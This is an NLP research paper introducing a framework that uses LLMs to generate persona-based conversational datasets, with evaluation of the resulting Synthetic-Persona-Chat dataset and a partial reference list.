In this paper, we introduce a new framework for generating large, customized persona-based conversational datasets that uses unsupervised LLMs to reduce human labor, introduces methods to generate, expand, and update personas automatically, and enforces a set of quality criteria including faithfulness to ensure dialogues are human-like. Our persona-based conversational dataset generation framework consists of a three-level pipeline:
1.
User Generation
2.
User Pairing
3.
Conversation Generation
The user generation step takes a set of seed personas, and augments it to create plausible user profiles. The user pairing step matches users to participate in conversations. The conversation generation produces plausible conversations between the selected user pairs. The conversation generation component uses a method similar to self-feedback Madaan et al. (2023) to iteratively improve the quality of generated samples.
We used the proposed framework to create Synthetic-Persona-Chat (SPC), a conversational dataset with 5k user personas, and 20k faithful dialogues. The framework we defined to create this dataset can be reused to define specialized personas, such as user music profiles, etc. to create application-specific datasets.
Our contributions are:
•
We propose an unsupervised approach to generate, and extend specialized personas using LLMs.
•
We introduce and evaluate a framework based on LLMs to evolve a dataset while imposing different objectives on it.
•
We release Synthetic-Persona-Chat, a high-quality, faithful, persona-based conversational dataset useful for several conversational tasks, such as training persona inference models.
2 Definitions
We define the faithful persona-based dialogue generation task. We begin by defining the persona-based dialogue generation task. We then formally define the faithfulness criteria as a desired quality for the generated dialogues. Throughout this section, we use π to refer to persona attributes (individual sentences which, together, form the user persona), U to refer to user profiles, and D to refer to conversations (dialogues).
Persona Attributes We define a user persona attribute as a sentence describing this user. "I like ice cream", "I have two brothers" and "My native language is Tamazight" are all examples of persona attributes. Let Ω be the universal set of persona attributes. Ω contains all natural language descriptions of all tangible features of any person, which is unbounded.
Persona Categories To help organize the vast space of personas, we adopt the approach of Lee et al. (2022) who introduced persona categories. Persona categories are groups of persona attributes that describe the same semantic feature of the user. In our work, we associate each persona category with a corresponding query that can be answered with all persona attributes in that category. For example, job and family situation are persona categories, and corresponding queries might be “What is your occupation?”, and “Do you have a family?”.
Persona Attribute Structure Persona attributes can overlap. For instance, the attribute "I introduced my kids to scuba diving at a young age" overlaps with the attribute "My eldest son goes to elementary school", since both include the "parenthood" feature of the user. Moreover, some persona attributes form a hierarchy, and some persona attributes are specific cases of other attributes.
User Profile We define a user profile as a set of persona attributes that can be used to describe a user. For a realistic user, the persona attributes describing a user profile should not contradict each other, and be consistent. An arbitrary persona attribute set U⊂Ω is a consistent set of persona attribute if, and only if:
∀π1∈U,∄Π2⊂U:(Π2≠∅)∧(Π2→¬π1)
Persona-based Conversation A persona-based conversation D contains utterances such that at least one persona attribute from each user profile can be inferred from it. For example, the persona attribute "I am a parent" can be inferred from the utterance "I just dropped off my son at school". A persona-based conversation model is a generative model that takes a pair of user profiles (U1, U2) as input, and returns a persona-based dialogue D between these two users.
Faithfulness One crucial quality for a persona-based conversation is that it should align with the user profile. Inspired by Daheim et al. (2023) which introduces dialogue system faithfulness to the knowledge contained in relevant documents, we specify the criterion of faithfulness to characterize the alignment between the utterances of a user in a persona-based conversation and their profile. The faithfulness criterion enforces the constraint that the utterances of a user should not decrease the likelihood of their persona. This criterion assumes the existence of both a prior probability of persona attributes, and an inference model for determining the probability of persona attributes conditioned on utterances. Let M be such an inference model, (U1, U2) a pair of user profiles, and D a persona-based conversation between them. To be a faithful conversation based on M, D should not contain any contradicting evidence to the persona attributes of the speakers: passing the conversation D as input to the inference model M should not reduce the inference probability of persona attributes in either of the user profiles U1 or U2. In other words, the probability of any persona attribute in the user profiles based on conversation D should not be less than the probability of that persona attribute without any assumptions. Formally, we call a conversation D faithful with respect to the user profiles U1 and U2, and inference model M if the following condition holds: ∀π∈U1∪U2:PM(π|D)≥PM(π). Where PM(π|D) indicates the probability that M infers the persona π given conversation D. We show examples of faithful, and unfaithful conversations in Figure 1.
Refer to caption
Figure 1: Unfaithful Conversation (Left): Loving steak is negatively correlated with the persona attribute "I am a vegetarian". Faithful Conversation (Right): It introduces no information that contradicts or weakens the user’s profile.
3 Method
In this section, we introduce our method to generate persona-based conversations. We create such conversations with minimum human input, starting from an initial dataset. Our process consists of three steps, as shown in Figure 2: user generation, user pairing, and conversation generation. The first component augments a set of seed persona attributes Π0 into an expanded set of persona attributes Πe, from which it creates user profiles. The second component pairs user profiles as interlocutors of a conversation. The third and final component uses an iterative process to generate high-quality conversations among user profile pairs. We detail each of these components below.
Refer to caption
Figure 2: Dataset Augmentation Pipeline
3.1 User Generation
The User Generation component is split into two sub-components:
1.
Persona Expansion
2.
User Profile Construction
We bootstrap seed persona attributes by using various prompts Brown et al. (2020b) to generate new persona attributes in the Persona Expansion step (Refer to Appendix A.1 for more details on the prompts used). We then create new user profiles by iteratively selecting random user persona attributes from the expanded persona attributes. We employ a Natural Language Inference (NLI) model to ensure the consistency of the constructed user profiles.
3.1.1 Persona Expansion
We propose an unsupervised method to augment a set of seed persona attributes Π0 into a super-set Πe. Unlike previous approaches Lee et al. (2022), our method is independent of human knowledge or intervention, making it capable of creating specialized personas in new domains. We proceed in two steps: query induction, and persona bootstrapping. In the query induction phase, we identify persona categories in Π0, along with associated queries. We then expand these queries into a set Q that also covers unobserved persona categories. The persona bootstrapping step leverages the category-based query set Q, and the initial persona attribute seed set Π0 to generate new persona attributes. Both of these steps are based on the bootstrapping technique Yarowsky (1995), and involve prompting an LLM. We provide a detailed description of these two steps in the following.
Query Induction As described in Section 2, each persona attribute belongs to at least one persona category, and each category is associated with a corresponding query that can be answered with persona attributes in that category. The query induction process initially identifies the queries associated with persona categories in Π0. It then bootstraps queries by feeding them to a prompted LLM to create more queries that are associated with unobserved categories, ultimately creating a query set Q. Including queries associated with unobserved persona categories facilitates the creation of a more diverse set of personas, and increases the scale of augmentation.
The query induction relies on the following assumption:
Assumption Let ℳ be an LLM, and let Γ be the set of all queries associated with all persona categories. If two persona attributes π1 and π2 belong to the same persona category, then there exists a query qℳ∈Γ such that π1 and π2 are ℳ’s output to qℳ.
The persona attributes "I am a doctor" and "I am a truck driver", for instance, both belong to the "job" category, leading to the query "What is your job?". We use an agglomerative clustering method to identify the persona categories in Π0. Let C be an arbitrary persona cluster in Π0. To generate a query for C, we select a random subset of persona attributes in C, and create a prompt using these samples. We employ this strategy to generate queries for all the clusters identified in Π0, and create a set of queries, which we refer to as Q0. Details on the clustering, query induction, together with examples of clusters, persona attributes, and induced queries are available in Appendix A.1. We come up with queries for new, unobserved persona categories by bootstrapping the queries in Q0: starting from Q=Q0, we iteratively sample a set of queries from Q, and create a prompt by concatenating them. We then prompt the LLM to generate a new query, and add it to the query set Q, as shown in Figure 3. We generated a total of |Q|=188 queries. This set of category-specific queries Q is later used to guide the LLM to generate new persona attributes from the specified category. Thus, higher values of |Q| result in greater diversity within the expanded persona attribute set.
Refer to caption
Figure 3: Query Induction Steps
Persona Bootstrapping We use the persona attribute seed set Π0 and category-specific queries Q to generate new persona attributes through a bootstrapping process. We initialize Π to Π0. At every iteration, we randomly select a subset of persona attributes from Π, and create a set of prompts as follows: we first concatenate a set of persona attributes s. For every query q∈Q, we then combine the concatenated samples s, and the query q to create a category-specific persona prompt. This prompt guides the LLM to generate a persona attribute for that persona category. The set of prompts obtained from this process is {sq|q∈Q}. We only add a new persona attribute to the set if its BERT embeddings Devlin et al. (2019) are not too close from existing ones, so as to prevent the addition of duplicates.
Each of these prompts is then fed to the LLM to create a new persona attribute, which is subsequently added to the set of persona attributes Π for the next iteration. We continue this iterative process until we have generated a total of 5k persona attributes. Figure 4 illustrates the persona bootstrapping process. Table 6 in the appendix contains the prompt template used in this component.
Refer to caption
Figure 4: Query-based Persona Bootstrapping Process
3.1.2 User Profile Construction
We build user profiles incrementally by sampling persona attributes from Πe, and adding the eligible ones. A persona attribute is eligible if it adheres to the criteria of consistency and non-redundancy. In other words, it should not contradict any attribute already in the user profile, and it should not be inferred by other persona attribute. We assess the consistency and redundancy of user profiles by leveraging an NLI model, and persona attribute clustering, respectively. The NLI model we employ is based on T5 Raffel et al. (2019), and has been trained on the TRUE dataset Honovich et al. (2022).
We create a user profile U by iteratively selecting a random candidate persona attribute π′∈Πe. We use the NLI model to assess whether π′ contradicts any persona attribute in the profile. This is determined by the condition: ∀π∈U:(π′↛¬π)∧(π↛¬π′), where → is an inference. Additionally, we evaluate the similarity of π′ to the persona attributes in U to prevent the addition of redundant attributes. We add π′ to U if it meets the consistency and non-redundancy criteria. We repeat this process until the user profile contains 5 persona attributes. Please refer to Appendix A.1 for more details on the user profile construction.
3.2 User Pairing
In this component, we identify potential pairs of users for conversations. As the conversations are persona-based, we hypothesize that they will be more engaging if the users’ personas exhibit more commonalities. We assign a similarity score to every pair of user profiles (U1,U2), indicating their semantic similarity. We leverage BERT to represent the user profiles. The similarity between U1 and U2 is defined as: |{(π1,π2)|π1∈U1,π2∈U2,∃c:π1,π2∈c}| Where c is a persona attributes cluster. The semantic similarity is quantified by the number of common persona categories in the user profiles. We pair U1 and U2 if their similarity exceeds a threshold of 2.
3.3 Conversation Generation
Our Conversation Generation component is similar to a general-purpose dataset generation framework that generates data samples, and refines them based on a set of predefined criteria, which we refer to as policies Madaan et al. (2023). The flexibility in the choice of policies for data generation allows us to emphasize different objectives. Once the active policies are selected, this component generates new data samples using a few input samples. The input to our Conversation Generation framework consists of a set of paired user profiles, a few samples of user profiles along with a persona-based conversation between them, and conversation quality metrics as policies. We follow a Generator-Critic architecture, and iteratively create the dataset following the steps shown in Figure 5:
Step 1 The Generator outputs candidate conversations between persona pairs using a few initial conversation samples.
Step 2 The Critic evaluates the candidate conversations based on the predetermined policies, and selects the best candidate conversations.
Step 3 The best candidate conversations are added to the dataset for the next iteration of generation.
This iterative process of selecting the top candidates and adding them to the dataset gradually improves the performance of the Generator.
Without any loss of generality, we implement both the Generator and the Critic based on LLMs. Specifically, the Generator prompts an LLM to create candidate conversations, while the Critic prompts an LLM to evaluate the quality of the generated conversations.
We provide more details on the Generator, Critic, and the policies we used.
Refer to caption
Figure 5: The Generator-Critic Architecture for Conversation Generation
The Generator outputs conversations for pairs of users (U1,U2) by prompting an LLM Brown et al. (2020b); Wei et al. (2023). At each iteration, it randomly selects 5 samples from an initial set of conversations, each containing a pair of user profiles and a dialogue among them. It feeds these samples to a template that instructs the LLM to generate a series of candidate conversations for the given user pair. The template, and a sample generated conversation are available in Table 6, and Table 8 in the appendix.
The Critic selects the best generated conversations to fine-tune the Generator. A conversation is deemed high-quality if it complies with the policies of the Critic. Given the multifaceted nature of the conversation evaluations, we use a Mixture of Experts (MoE) approach. Each expert evaluates the conversation based on a specific policy. In this paper, we incorporate three types of experts, each with distinct criteria: general conversation quality, persona faithfulness, and toxicity. Collectively, these experts select the best generated conversations (the single best in our experiments). We describe each type of expert, and the collective decision-making process below.
General Conversation Quality experts assess conversation quality using the Fine-grained Evaluation of Dialog (FED) metrics introduced in Mehri and Eskénazi (2020). These experts use verbalized forms of the policies from FED as prompts. For instance, the "conversation depth quality expert" transforms the "depth policy" from FED into a prompt like "Which conversation is a deeper conversation between user 1 and user 2?". Our system instructs the LLM to compare each pair of candidate conversations based on these policies, resulting in pairwise comparisons. The list of policies and their baseline performance are presented in Table 5 in Appendix A.2.
The Faithfulness expert ensures the consistency of the generated conversations with the user profiles. It uses an LLM to identify instances of unfaithful conversations. The faithfulness prompt provides the LLM with explicit instructions, user profiles, and human-curated examples of unfaithful conversations.
The Toxicity expert detects any conversation that exhibits harmful traits, including bias and hate.
The Critic filters unfaithful and toxic conversations out. It then selects the best conversations using a majority vote among the General Conversation Quality experts. The selected instances are added to the dataset for the next iteration of the Generator.
4 Evaluation
We evaluate different aspects of our dataset generation framework, and the resulting dataset - referred to as Synthetic-Persona-Chat - which is created using an instruction fine-tuned LLM with 24 billion parameters Chung et al. (2022). We compare Synthetic-Persona-Chat (SPC) against the widely used Persona-Chat (PC) dataset across different dimensions. We begin by evaluating the quality of the personas we generate. We then evaluate SPC using both automatic metrics, and human assessment. We analyze other aspects of SPC, such as toxicity and diversity in appendices B.1 and B.1.
4.1 Evaluation of the Expanded Personas
We evaluate our persona expansion module on two seed datasets: Wikipedia, and Persona-Chat. The Wikipedia personas are created by crawling the 1,000 most active contributors2
2
https://en.wikipedia.org/wiki/Wikipedia:List_of_Wikipedians_by_number_of_edits, and extracting user boxes from their pages. We expand both datasets using our framework, and evaluate the expanded persona attribute sets using automatic metrics. Table 1 compares the original persona sets to the expanded ones on a few dimensions. We observe that our persona expansion increases the number of persona attributes in SPC by 119%, while maintaining the original persona categories and expanding them by 71% compared to the persona attributes in PC. Moreover, the lengths of the new generated persona attributes are 107% longer in SPC, indicating that the new personas exhibit greater detail and specificity. We observe a similar trend when applying our persona expansion to the Wikipedia persona set, with a 108% increase in the number of persona attributes, a 140% increase in persona categories, and a 45% growth in persona attribute lengths. This demonstrates the effectiveness of our method in expanding and diversifying persona sets.
Dataset Persona-Chat Synthetic-Persona-Chat Wikipedia Wikipedia+
# Persona Attributes 4,723 10,371 8768 18,293
# Clusters 323 553 408 986
Inter-cluster Dist 0.836 0.863 0.816 0.85
AVG length 7.65 15.9* 10.45 15.2*
Table 1: Evaluation of the expanded persona sets. The numbers with * indicate the metric value of the newly generated persona attributes to contrast with the initial set.
4.2 Next Utterance Prediction
A persona-based conversation reflects the speaker’s persona explicitly or implicitly. Therefore, we expect the inclusion of information about speaker personas to enhance the performance of next utterance prediction models in such conversations. In this experiment, we assess the impact of incorporating speaker personas as prior information on both ranking, and generative - Transformer based Vaswani et al. (2017) - next utterance prediction models. We create a subset of SPC containing conversations among user pairs included in PC for a fair comparison.
Persona-Chat Synthetic-Persona-Chat
Method Metric None Persona % Change None Persona % Change
IR Baseline hit@1 18.69 36.86 +97 19.37 (19.92) 39.6 (26.23) +104 (+31)
Transformer (Ranker) hit@1 14.24 19.21 +35 9.71 (64.24) 11.74 (68.82) +21 (+7)
Transformer (Generator) hit@1 8.54 6.78 -20 6.89 (41.32) 6.66 (37.35) -3 (-9)
Perplexity 122.5 173.3 +41 1032 (5.24) 1126 (5.73) +9 (+9)
BLUE 0.120 0.094 -21 0.097 (0.289) 0.083 (0.251) -14 (-13)
ROUGE 0.141 0.113 -24 0.123 (0.348) 0.107 (0.309) -13 (-11)
Table 2: Results of the next utterance prediction experiment. Performance of the trained model on the test split of Persona-Chat is represented by the numbers in the table, while the numbers in parentheses indicate results for the test split of Synthetic-Persona-Chat.
We observe (Table 2) that the performance of ranking models increases when personas are given to the models as input for both datasets. Specifically, the Transformer (Ranker) model, known for its ability to capture conversational complexity, exhibits higher performance in SPC when evaluated on the SPC test set compared to the PC test set. However, it demonstrates relatively weaker performance when trained on the PC. This implies that SPC contains more intricate and coherent conversations.
The Transformer (Ranker) trained on SPC achieves a hit@1 of 64.24 on SPC test, 350% higher than PC (14.24). This suggests that the Transformer model can more accurately predict the next utterance in SPC, pointing to a greater coherency in conversations.
The performance of the Information Retrieval (IR) Baseline model is slightly higher for SPC: it rises by 31% when conditioned on user personas, which is lower than 97% improvement in PC. A key contributing factor for the performance improvement of the retrieval-based model (IR Baseline) on PC given the personas, is the participants’ tendency to copy persona words in the conversations, whereas in SPC the personas are more implicitly reflected in the conversations. The implicit reflection of personas in SPC, makes the task more challenging for word based retrieval models, necessitating reasoning that goes beyond word level. However, when the model is trained on SPC and tested on PC, the improvement is as high as when the model is trained on PC, i.e. 104% compared to 97%.
The performance of generative models is low for this task since these models are not trained with the ranking objective. However, the performance difference while the models are conditioned on personas is lower for the model trained on SPC, with a 20% drop for the model trained on PC against 3% drop in the model trained on SPC. The increase in perplexity is 9% in SPC compared to 41% in PC. The lower rate of perplexity increase and performance drop of the model given user personas as input highlights the higher alignment of conversations with personas in SPC.
We also evaluate the performance of the next utterance prediction models when given no user, one user, and both user personas. The results suggest a higher degree of bidirectionality in SPC. We refer the reader to the Appendix B.1 for more details.
4.3 Human Evaluation
We compare the quality of the conversations generated by our framework against those in Persona-Chat. We randomly select 200 conversations from PC, together with their corresponding user pairs, and use our method to generate conversations among the same users. We start by following Gehrmann et al. (2019) in running a human experiment to try and detect AI-generated content. We conduct a Turing test where we present pairs of conversations to humans, and ask them to identify the synthetically generated one. This test is carried out on the generated conversations at the end of each iteration of creating SPC. We repeat the test for conversations generated for new persona pairs, which we refer to as iteration 3*, i.e. we pair each of these conversations with a random conversation from PC. For a robust evaluation, every pair of conversations is annotated by 3 human evaluators, and the majority vote is used as the final annotation. Details of this test are available in Appendix B.2. The results of this experiment can be found in Table 3. We observe that the losing rate of SPC is reduced by 48% from SPC Iter 1 to SPC Iter 3, and dropped below the rate of 10%. Interestingly, 91% of the conversations in SPC, which are synthetically generated, are judged as human-like as the conversations generated by humans. Moreover, conversations generated for new personas (Iteration 3*) are deemed artificial in only 8.04% of cases, showing that SPC is more realistic than PC.
We also evaluate the faithfulness of the generated conversations. For each conversation, we provide annotators with a faithfulness annotation task including the speakers’ persona attributes and distractor persona attribute options as shown in Figure 8. We evaluate faithfulness during 3 iterations of conversation generation for the selected 200 user pairs, and the annotators evaluate the generated conversations for each pair in every iteration. The results show that, while improving the Turing test results, faithfulness of conversations are consistently higher than 75% with at most 3% variation in between iterations, indicating high faithfulness in all iterations.
Finally, we assess the impact of LLM size on the quality of the generated dataset within our framework. We create a variant of SPC using an LLM with 540 billion parameters (LLM2). Table 3 presents human evaluations comparing the smaller LLM in multiple iterations to a single-iteration approach with LLM2. The larger model exhibits a 5% advantage in the Turing test over the first iteration of dataset generation over the smaller model. After two iterations, however, the multi-iteration approach outperforms the first iteration of the bigger model, showing our framework’s capacity for cost-effective, high-quality conversation generation.
Conversation Source Lose Win Tie Faithful
SPC Iter 1 17.2 30.1 52.68 78.5
SPC Iter 2 18.5 49 32.5 80.5
SPC Iter 3 8.8 35.23 55.95 76.6
SPC Iter 3* 8.04 32.66 59.29 N/A
SPC (LLM2) 11.5 39 49.5 N/A
Table 3: Turing Test on 200 Generated Conversations per Iteration: Synthetic-Persona-Chat Outcomes Against Persona-Chat.
5 Related Work
Large Language Models (LLMs) have been used for data augmentation Shin et al. (2021), generation Kim et al. (2023); Dong et al. (2023), and evaluation Zhang et al. (2019); Liu et al. (2023). One of the earliest works in this area Anaby-Tavor et al. (2019) used LLMs to create a large text dataset from a small, labeled one. This idea was followed by Wang et al. (2021); Schick and Schütze (2021) which leveraged LLMs to create datasets without any human data. Kumar et al. (2020) evaluated the performance of different LLMs on the data augmentation task. Several conversational dataset generation methods focused on the structure of the conversational data Dai et al. (2022); Leszczynski et al. (2023); Abbasiantaeb et al. (2023). Mehri et al. (2022) illustrated how Large Language Models (LLMs) can effectively generate synthetic training data for task-oriented dialogue models.
Persona-based conversations have been a popular research topic in NLP Liu et al. (2022). One of the earliest works in this area is Persona-Chat, by Zhang et al. (2018), which proposed the Persona-Chat dataset and evaluation metrics that have become a benchmark for persona-based conversation generation Mazaré et al. (2018). Many subsequent works have used this dataset to train and evaluate their models, including DialoGPT Zhang et al. (2020), BlenderBot Shuster et al. (2022), and PersonaChatGen Lee et al. (2022). PersonaChatGen automated the process of creating persona based conversations of Persona-Chat using LLMs. A challenge in generating synthetic datasets is to ensure the quality of the conversation including data faithfulness, fidelity, diversity, and consistency Li et al. (2016); Lee et al. (2023); Veselovsky et al. (2023); Zhuo et al. (2023); Wang et al. (2023a); Mündler et al. (2023). Several works have focused on creating and using high quality training datasets Welleck et al. (2019), and creating quality filtering components to their conversation dataset generation Lewkowycz et al. (2022). Evaluation of the resulting conversational datasets is also challenging Xu et al. (2021). Wang et al. (2023b) recently introduced the paradigm of interactive evaluation of conversations with LLMs.
6 Conclusion and Future Work
We developed a novel framework for generating high-quality persona-based conversations using LLMs, resulting in the creation of Synthetic-Persona-Chat, comprising 20k conversations. We hope this dataset will support future endeavors in developing persona-aware conversational agents, including the generation of domain-specific multi-session conversations for specialized, task-oriented interactions. While we focused on a persona-based dataset generation task, our Generator-Critic approach can be generalized to other use cases, such as generating other specialized datasets, etc.
Limitations
In this paper, we define an iterative process over LLMs to generate a dataset. Our method requires computational resources, and access to an LLM. The quality of the dataset is bounded by the LLM, since the quality critics are also using the same LLM, and we leave the iterative improvement of our critics as future work. The main limitation of this data generation framework is the inability to generate realistic conversations that do not have high quality, since we assume that both parties are fluent, that the conversation flow is perfectly consistent, and there is no unexpected event (e.g. an interruption by another person, connection loss, etc.) in the middle of the conversation. Another limitation of our method is the difficulty of incorporating less tangible persona traits, such as a sense of humor, or user attributes that require multiple conversation sessions to be reflected.
Ethics Statement
The approach of generating datasets based on some desired objective might be used to create harmful datasets, and train malicious models based on them, such as a biased dataset, or a hateful speech one Hartvigsen et al. (2022). On the other hand, these datasets and models can be used as filters in application tasks.
We used Amazon Mechanical Turk in our human experiments, and followed that platform’s guidelines to protect the rights of human raters. The participation was voluntary, and the raters were informed of their rights at the beginning of the study. The platform implemented security measures to protect them, and prevent the disclosure of any Personal Identifiable Information about them. Furthermore, we offered higher than minimum standard wage compensation to avoid any exploitative practices.
To avoid having any toxic conversation in the final dataset, we also used several tools to remove any potentially toxic conversation. Details about these tools, and example removed samples are available in Appendix B.1.
Acknowledgements
The authors would like to thank Kian Ahrabian, Eric Boxer, Luke Friedman, Iñaki Iturrate, Kathy Meir-Hellstern, Filip Radlinski, and Kexuan Sun for their valuable comments on this manuscript.
References
Abbasiantaeb et al. (2023)
Zahra Abbasiantaeb, Yifei Yuan, E. Kanoulas, and Mohammad Aliannejadi. 2023. Let the llms talk: Simulating human-to-human conversational qa via zero-shot llm-to-llm interactions.
Anaby-Tavor et al. (2019)
Ateret Anaby-Tavor, Boaz Carmeli, Esther Goldbraich, Amir Kantor, George Kour, Segev Shlomov, N. Tepper, and Naama Zwerdling. 2019. Not enough data? deep learning to the rescue! ArXiv, abs/1911.03118.
Bansal and Sharma (2023)
Parikshit Bansal and Amit Sharma. 2023. Large language models as annotators: Enhancing generalization of nlp models at minimal cost. ArXiv, abs/2306.15766.
Blei et al. (2004)
D. M. Blei, T. L. Griffiths, M. I. Jordan, and J. B. Tenenbaum. 2004. Hierarchical topic models and the nested Chinese restaurant process. In Advances in Neural Information Processing Systems 16. MIT Press, Cambridge, MA.
Brown et al. (2020a)
Tom B. Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, T. J. Henighan, Rewon Child, Aditya Ramesh, Daniel M. Ziegler, Jeff Wu, Clemens Winter, Christopher Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. 2020a. Language models are few-shot learners. ArXiv, abs/2005.14165.
Brown et al. (2020b)
Tom B. Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel M. Ziegler, Jeffrey Wu, Clemens Winter, Christopher Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. 2020b. Language models are few-shot learners.
Chiang and yi Lee (2023)
Cheng-Han Chiang and Hung yi Lee. 2023. Can large language models be an alternative to human evaluations? In Annual Meeting of the Association for Computational Linguistics.
Chung et al. (2022)
Hyung Won Chung, Le Hou, Shayne Longpre, Barret Zoph, Yi Tay, William Fedus, Yunxuan Li, Xuezhi Wang, <PRESIDIO_ANONYMIZED_PERSON>, Siddhartha Brahma, Albert Webson, Shixiang Shane Gu, Zhuyun Dai, Mirac Suzgun, Xinyun Chen, Aakanksha Chowdhery, Alex Castro-Ros, Marie Pellat, Kevin Robinson, Dasha Valter, Sharan Narang, Gaurav Mishra, Adams Yu, Vincent Zhao, Yanping Huang, Andrew Dai, Hongkun Yu, Slav Petrov, Ed H. Chi, Jeff Dean, Jacob Devlin, Adam Roberts, Denny Zhou, Quoc V. Le, and Jason Wei. 2022. Scaling instruction-finetuned language models.
Claus (2019)
Lisbeth Claus. 2019. Hr disruption—time already to reinvent talent management. BRQ Business Research Quarterly, 22.
Cooper and Saffo (1999)
Alan Cooper and Paul Saffo. 1999. The Inmates Are Running the Asylum. Macmillan Publishing Co., Inc., USA.
Daheim et al. (2023)
Nico Daheim, Nouha Dziri, Mrinmaya Sachan, Iryna Gurevych, and Edoardo M. Ponti. 2023. Elastic weight removal for faithful and abstractive dialogue generation.
Dai et al. (2022)
Zhuyun Dai, Arun Tejasvi Chaganty, Vincent Zhao, Aida Amini, Qazi Mamunur Rashid, Mike Green, and Kelvin Guu. 2022. Dialog inpainting: Turning documents into dialogs. ArXiv, abs/2205.09073.
Devlin et al. (2019)
Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. 2019. Bert: Pre-training of deep bidirectional transformers for language understanding. ArXiv, abs/1810.04805.
Dong et al. (2023)
Hanze Dong, Wei Xiong, Deepanshu Goyal, Rui Pan, Shizhe Diao, Jipeng Zhang, Kashun Shum, and T. Zhang. 2023. Raft: Reward ranked finetuning for generative foundation model alignment. ArXiv, abs/2304.06767.
Fu et al. (2023)
Jinlan Fu, See-Kiong Ng, Zhengbao Jiang, and Pengfei Liu. 2023. Gptscore: Evaluate as you desire. ArXiv, abs/2302.04166.
Fuglerud et al. (2020)
Kristin Fuglerud, Trenton Schulz, Astri Janson, and Anne Moen. 2020. Co-creating Persona Scenarios with Diverse Users Enriching Inclusive Design, pages 48–59.
Gehrmann et al. (2019)
Sebastian Gehrmann, Hendrik Strobelt, and Alexander M. Rush. 2019. Gltr: Statistical detection and visualization of generated text. In Annual Meeting of the Association for Computational Linguistics.
Hartvigsen et al. (2022)
Thomas Hartvigsen, Saadia Gabriel, Hamid Palangi, Maarten Sap, Dipankar Ray, and Ece Kamar. 2022. Toxigen: A large-scale machine-generated dataset for adversarial and implicit hate speech detection. ArXiv, abs/2203.09509.
He et al. (2023)
Xingwei He, Zheng-Wen Lin, Yeyun Gong, Alex Jin, Hang Zhang, Chen Lin, Jian Jiao, Siu Ming Yiu, Nan Duan, and Weizhu Chen. 2023. Annollm: Making large language models to be better crowdsourced annotators. ArXiv, abs/2303.16854.
Honovich et al. (2022)
Or Honovich, Roee Aharoni, Jonathan Herzig, Hagai Taitelbaum, Doron Kukliansy, Vered Cohen, Thomas Scialom, Idan Szpektor, Avinatan Hassidim, and Yossi Matias. 2022. TRUE: Re-evaluating factual consistency evaluation. In Proceedings of the 2022 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 3905–3920, Seattle, United States. Association for Computational Linguistics.
Humeau et al. (2020)
Samuel Humeau, Kurt Shuster, Marie-Anne Lachaux, and Jason Weston. 2020. Poly-encoders: Transformer architectures and pre-training strategies for fast and accurate multi-sentence scoring.
Kim et al. (2023)
Hyunwoo Kim, Jack Hessel, Liwei Jiang, Peter West, Ximing Lu, Youngjae Yu, Pei Zhou, Ronan Le Bras, Malihe Alikhani, Gunhee Kim, Maarten Sap, and Yejin Choi. 2023. Soda: Million-scale dialogue distillation with social commonsense contextualization.
Kumar et al. (2020)
Varun Kumar, Ashutosh Choudhary, and Eunah Cho. 2020. Data augmentation using pre-trained transformer models. ArXiv, abs/2003.02245.
Lazaridou et al. (2021)
Angeliki Lazaridou, Adhiguna Kuncoro, Elena Gribovskaya, Devang Agrawal, Adam Liska, Tayfun Terzi, Mai Gimenez, Cyprien de Masson d’Autume, Tomás Kociský, Sebastian Ruder, Dani Yogatama, Kris Cao, Susannah Young, and Phil Blunsom. 2021. Mind the gap: Assessing temporal generalization in neural language models. In Neural Information Processing Systems.
Lee et al. (2023)
Dong-Ho Lee, Jay Pujara, Mohit Sewak, Ryen W White, and Sujay Kumar Jauhar. 2023. Making large language models better data creators. In The 2023 Conference on Empirical Methods in Natural Language Processing (EMNLP).
Lee et al. (2022)
Young-Jun Lee, Chae-Gyun Lim, Yunsu Choi, Ji-Hui Lm, and Ho-Jin Choi. 2022. PERSONACHATGEN: Generating personalized dialogues using GPT-3. In Proceedings of the 1st Workshop on Customized Chat Grounding Persona and Knowledge, pages 29–48, Gyeongju, Republic of Korea. Association for Computational Linguistics.
Leszczynski et al. (2023)
Megan Leszczynski, Ravi Ganti, Shu Zhang, Krisztian Balog, Filip Radlinski, Fernando Pereira, and Arun Tejasvi Chaganty. 2023. Generating synthetic data for conversational music recommendation using random walks and language models. ArXiv, abs/2301.11489.
Lewkowycz et al. (2022)
Aitor Lewkowycz, Anders Andreassen, David Dohan, Ethan Dyer, Henryk Michalewski, Vinay Ramasesh, Ambrose Slone, Cem Anil, Imanol Schlag, Theo Gutman-Solo, Yuhuai Wu, Behnam Neyshabur, Guy Gur-Ari, and Vedant Misra. 2022. Solving quantitative reasoning problems with language models.
Li et al. (2016)
Jiwei Li, Michel Galley, Chris Brockett, Georgios P. Spithourakis, Jianfeng Gao, and William B. Dolan. 2016. A persona-based neural conversation model. ArXiv, abs/1603.06155.
Lin and Chen (2023)
Yen-Ting Lin and Yun-Nung (Vivian) Chen. 2023. Llm-eval: Unified multi-dimensional automatic evaluation for open-domain conversations with large language models. ArXiv, abs/2305.13711.
Liu et al. (2022)
Junfeng Liu, Christopher T. Symons, and Ranga Raju Vatsavai. 2022. Persona-based conversational ai: State of the art and challenges. 2022 IEEE International Conference on Data Mining Workshops (ICDMW), pages 993–1001.
Liu et al. (2023)
Yang Liu, Dan Iter, Yichong Xu, Shuo Wang, Ruochen Xu, and Chenguang Zhu. 2023. G-eval: Nlg evaluation using gpt-4 with better human alignment. ArXiv, abs/2303.16634.
Madaan et al. (2023)
